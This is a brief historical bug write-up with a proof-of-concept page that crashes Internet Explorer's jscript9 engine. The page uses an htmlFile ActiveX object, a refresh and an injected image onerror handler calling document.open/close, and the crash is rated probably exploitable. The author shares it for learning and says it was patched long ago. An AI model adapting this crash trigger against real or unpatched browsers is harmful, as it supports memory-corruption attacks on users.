Creating an htmlFile ActiveX object, refreshing its document, and then triggering a document.open(); document.close() pair via an injected image error handler inside a setTimeout caused a crash rated as PROBABLY_EXPLOITABLE in jscript9!CScriptBody::CScriptBody.

<script>
var axDoc;

function main()
{
    // Create a detached HTML document via the htmlFile ActiveX object.
    axDoc = new ActiveXObject("htmlFile");
    axDoc.execCommand("Refresh"); // Refreshing is essential.
    // Delay the write so it lands after the refresh has started.
    setTimeout("writeAxDoc()", 500);
}
function writeAxDoc()
{
    // Inject an <img> whose onerror handler schedules document.open();document.close()
    // on the htmlFile document through another setTimeout.
    var myDiv = axDoc.createElement("div");
    myDiv.innerHTML = '<img src=1 onerror="setTimeout(\'document.open();document.close()\')">';
}
</script>
<input type="button" onclick="main()" value="CrashMe" />

The fault landed in jscript9!CScriptBody::CScriptBody — a null pointer read where the faulting address was later used as the target of a branch, indicating potential code-flow control. A simpler variation using setTimeout("document.write(1);alert(2)",2000) directly in the htmlFile also demonstrated the timing dependency.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.